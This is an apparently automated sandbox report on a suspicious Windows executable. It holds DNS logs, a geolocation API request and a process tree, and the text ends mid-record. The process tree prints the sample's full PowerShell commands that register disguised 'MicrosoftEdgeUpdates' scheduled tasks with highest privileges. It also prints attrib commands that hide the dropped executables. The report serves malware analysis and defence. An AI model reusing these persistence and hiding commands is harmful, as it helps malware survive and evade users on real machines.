                                                                                                                      Dec 29, 2024 13:40:52.606369019 CET1.1.1.1192.168.2.40xe191No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:52.606369019 CET1.1.1.1192.168.2.40xe191No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:52.606369019 CET1.1.1.1192.168.2.40xe191No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:53.174746037 CET1.1.1.1192.168.2.40x763aNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:53.174746037 CET1.1.1.1192.168.2.40x763aNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:53.174746037 CET1.1.1.1192.168.2.40x763aNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:53.176260948 CET1.1.1.1192.168.2.40x3ad1No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:53.237669945 CET1.1.1.1192.168.2.40xfbd3No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:53.237669945 CET1.1.1.1192.168.2.40xfbd3No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:53.237669945 CET1.1.1.1192.168.2.40xfbd3No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:53.237771988 CET1.1.1.1192.168.2.40x83dfNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:53.237771988 CET1.1.1.1192.168.2.40x83dfNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:57.705255985 CET1.1.1.1192.168.2.40x2f02No error (0)edge.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:57.705255985 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:57.705255985 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:57.705255985 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:57.705255985 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:58.718360901 CET1.1.1.1192.168.2.40x2f02No error (0)edge.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:58.718360901 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:58.718360901 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:58.718360901 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:58.718360901 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:59.737623930 CET1.1.1.1192.168.2.40x2f02No error (0)edge.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:59.737623930 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:59.737623930 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:59.737623930 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:59.737623930 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:01.753962994 CET1.1.1.1192.168.2.40x2f02No error (0)edge.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:01.753962994 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:01.753962994 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:01.753962994 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:01.753962994 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.110150099 CET1.1.1.1192.168.2.40x5e94No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.110150099 CET1.1.1.1192.168.2.40x5e94No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.250217915 CET1.1.1.1192.168.2.40xd037No error (0)scdn38c07.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.250217915 CET1.1.1.1192.168.2.40xd037No error (0)sni1gl.wpc.alphacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.250535011 CET1.1.1.1192.168.2.40x69a9No error (0)scdn38c07.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.343636990 CET1.1.1.1192.168.2.40xcea6No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.343636990 CET1.1.1.1192.168.2.40xcea6No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.483345032 CET1.1.1.1192.168.2.40x999eNo error (0)scdn1efff.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.483427048 CET1.1.1.1192.168.2.40xcce3No error (0)scdn1efff.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.483427048 CET1.1.1.1192.168.2.40xcce3No error (0)sni1gl.wpc.alphacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.560326099 CET1.1.1.1192.168.2.40xd562No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.560326099 CET1.1.1.1192.168.2.40xd562No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.595151901 CET1.1.1.1192.168.2.40x1819No error (0)api.company-target.com108.139.79.18A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.595151901 CET1.1.1.1192.168.2.40x1819No error (0)api.company-target.com108.139.79.14A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.595151901 CET1.1.1.1192.168.2.40x1819No error (0)api.company-target.com108.139.79.15A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.595151901 CET1.1.1.1192.168.2.40x1819No error (0)api.company-target.com108.139.79.76A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.865436077 CET1.1.1.1192.168.2.40xa73eNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.865436077 CET1.1.1.1192.168.2.40xa73eNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:05.887739897 CET1.1.1.1192.168.2.40x2f02No error (0)edge.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:05.887739897 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:05.887739897 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:05.887739897 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:05.887739897 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:07.079199076 CET1.1.1.1192.168.2.40x46b2No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:07.079199076 CET1.1.1.1192.168.2.40x46b2No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • https:
                                                                                                                        • api.company-target.com

                                                                                                                      HTTPS Proxied Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      0192.168.2.450227108.139.79.18443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-29 12:41:06 UTC789OUTGET /api/v3/ip.json?key=7D8lsDsuK7OQCqWFQDi6VqJjwaKomm62lkY5XEyw&referrer=&page=https%3A%2F%2Fwww.microsoft.com%2Fen-us%2Fwindows%2Fwindows-10-specifications&title=Check%20Windows%2010%20System%20Requirements%20%26%20Specs%20%7C%20Microsoft HTTP/1.1
                                                                                                                      Host: api.company-target.com
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: */*
                                                                                                                      Origin: https://www.microsoft.com
                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Referer: https://www.microsoft.com/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-29 12:41:07 UTC1031INHTTP/1.1 200 OK
                                                                                                                      Content-Type: application/json;charset=utf-8
                                                                                                                      Content-Length: 482
                                                                                                                      Connection: close
                                                                                                                      Date: Sun, 29 Dec 2024 12:41:06 GMT
                                                                                                                      Request-ID: 47e9caee-f4f6-420c-8934-eb25f834ea36
                                                                                                                      Server: nginx
                                                                                                                      Access-Control-Allow-Origin: https://www.microsoft.com
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: x-amz-cf-id
                                                                                                                      Access-Control-Max-Age: 7200
                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                      Access-Control-Allow-Headers: DNT,X-Mx-ReqToken,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Api-Version: v3
                                                                                                                      Identification-Source: CENTRAL
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Sat, 28 Dec 2024 12:41:06 GMT
                                                                                                                      Vary: Accept-Encoding, Origin
                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                      Via: 1.1 54f388662c0be6cc8275058896dbbae6.cloudfront.net (CloudFront)
                                                                                                                      X-Amz-Cf-Pop: DXB53-P1
                                                                                                                      X-Amz-Cf-Id: Sw1VGxc_7iW7JIsYjbiZHsvElD1dmqqsmNC9rbfS28cUT8R5F138aQ==
                                                                                                                      2024-12-29 12:41:07 UTC482INData Raw: 7b 22 72 65 67 69 6f 6e 5f 6e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 73 74 72 79 5f 64 6d 61 5f 63 6f 64 65 22 3a 35 30 31 2c 22 72 65 67 69 73 74 72 79 5f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 33 22 3a 6e 75 6c 6c 2c 22 72 65 67 69 73 74 72 79 5f 63 6f 6d 70 61 6e 79 5f 6e 61 6d 65 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 20 4c 4c 43 22 2c 22 72 65 67 69 73 74 72 79 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 22 72 65 67 69 73 74 72 79 5f 73 74 61 74 65 22 3a 22 4e 59 22 2c 22 72 65 67 69 73 74 72 79 5f 7a 69 70 5f 63 6f 64 65 22 3a 22 31 30 30 30 31 22 2c 22 72 65 67 69 73 74 72 79 5f 61 72 65 61 5f 63 6f 64 65 22 3a 6e 75 6c 6c 2c 22 72 65 67 69 73 74 72 79 5f
                                                                                                                      Data Ascii: {"region_name":"New York","registry_dma_code":501,"registry_country_code3":null,"registry_company_name":"CenturyLink Communications LLC","registry_city":"New York City","registry_state":"NY","registry_zip_code":"10001","registry_area_code":null,"registry_


                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      High Level Behavior Distribution

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Target ID:0
                                                                                                                      Start time:07:38:56
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe"
                                                                                                                      Imagebase:0x7ff7a6730000
                                                                                                                      File size:38'135'059 bytes
                                                                                                                      MD5 hash:477D3B9EE775C048F96B450DD00BA490
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:1
                                                                                                                      Start time:07:38:57
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe"
                                                                                                                      Imagebase:0x7ff7a6730000
                                                                                                                      File size:38'135'059 bytes
                                                                                                                      MD5 hash:477D3B9EE775C048F96B450DD00BA490
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:2
                                                                                                                      Start time:07:38:59
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../LineInst.exe'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date); $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnce' -Description 'MicrosoftEdgeUpdatesOnce once' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnce' "
                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                      File size:452'608 bytes
                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:3
                                                                                                                      Start time:07:38:59
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:4
                                                                                                                      Start time:07:39:01
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../WinHex.exe'; $Trigger = New-ScheduledTaskTrigger -AtLogon; $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnceMe' -Description 'MicrosoftEdgeUpdatesOnce once You' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnceMe' "
                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                      File size:452'608 bytes
                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:5
                                                                                                                      Start time:07:39:01
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:6
                                                                                                                      Start time:07:39:01
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "attrib +s +a +h C:\Users\user\AppData\LineInst.exe&&attrib +s +a +h C:\Users\user\AppData\WinHex.exe&&attrib +s +a +h C:\Users\user\AppData\SystemUpdate.exe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:7
                                                                                                                      Start time:07:39:01
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:8
                                                                                                                      Start time:07:39:01
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\attrib.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:attrib +s +a +h C:\Users\user\AppData\LineInst.exe
                                                                                                                      Imagebase:0x7ff617380000
                                                                                                                      File size:23'040 bytes
                                                                                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:9
                                                                                                                      Start time:07:39:01
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\attrib.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:attrib +s +a +h C:\Users\user\AppData\WinHex.exe
                                                                                                                      Imagebase:0x7ff617380000
                                                                                                                      File size:23'040 bytes
                                                                                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:10
                                                                                                                      Start time:07:39:02
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\attrib.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:attrib +s +a +h C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      Imagebase:0x7ff617380000
                                                                                                                      File size:23'040 bytes
                                                                                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:11
                                                                                                                      Start time:07:39:05
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Users\user\AppData\LineInst.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\../LineInst.exe
                                                                                                                      Imagebase:0xa70000
                                                                                                                      File size:19'463'448 bytes
                                                                                                                      MD5 hash:AA2AD37BB74C05A49417E3D2F1BD89CE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:12
                                                                                                                      Start time:07:39:05
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Users\user\AppData\WinHex.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\../WinHex.exe
                                                                                                                      Imagebase:0x7ff7c5bd0000
                                                                                                                      File size:19'293'911 bytes
                                                                                                                      MD5 hash:EFDC5DBA52333C0F5EEEDB0308FBE2D0
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:13
                                                                                                                      Start time:07:39:08
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\$Windows.~WS\Sources\SetupHost.Exe" /Download /Web
                                                                                                                      Imagebase:0x4c0000
                                                                                                                      File size:699'192 bytes
                                                                                                                      MD5 hash:A5D94F9587F97E9C674447447721B77F
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:14
                                                                                                                      Start time:07:39:10
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\vdsldr.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                                      Imagebase:0x7ff61c4e0000
                                                                                                                      File size:27'136 bytes
                                                                                                                      MD5 hash:472A05A6ADC167E9E5D2328AD98E3067
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:15
                                                                                                                      Start time:07:39:11
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Users\user\AppData\WinHex.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\../WinHex.exe
                                                                                                                      Imagebase:0x7ff7c5bd0000
                                                                                                                      File size:19'293'911 bytes
                                                                                                                      MD5 hash:EFDC5DBA52333C0F5EEEDB0308FBE2D0
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:17
                                                                                                                      Start time:07:39:13
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\SystemUpdate.exe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
